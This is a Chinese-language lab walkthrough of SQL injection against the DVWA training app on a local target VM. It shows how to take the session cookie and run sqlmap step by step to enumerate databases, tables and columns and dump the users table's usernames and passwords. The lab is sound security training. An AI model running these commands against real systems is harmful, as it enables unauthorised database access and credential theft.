0.测试准备
1)打开Kali虚拟机终端;
2)打开靶机OWASP,并通过浏览器,输入IP地址进入dvwa的主页,然后选择SQL injection进入SQL注入的测试页面
1.获取DVWA的url和cookie
在输入框中输入1,显示有内容,此时利用此URL进行SQL注入。
输入document.cookie获取页面的cookie。去除remem_token字段的内容,用于下文的sql注入终端的cookie。
3.在终端开始测试
1)终端中输入指令一:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” --dbs
结果如下,说明找到了连个数据库dvwa和information_schema,接下来获取数据库dvwa 中的表格。
2)在终端中输入指令二:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” -D dvwa --tables
结果如下,发现有两个表格,guestbook和users,接下来获取users数据表中有哪些列。
3)在终端中输入指令三:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” -D dvwa -T users --columns
结果如下,说明users一共有六列,接下来获取具体内容
4)在终端中输入指令四,有提示信息则输入y:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” -D dvwa -T users --dump
结果如下,表格中的数据即显示。
5)若数据库中数据较多,可在终端中输入指令五,只输出用户名和密码字段:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” -D dvwa -T users -C “user,password” --dump
结束!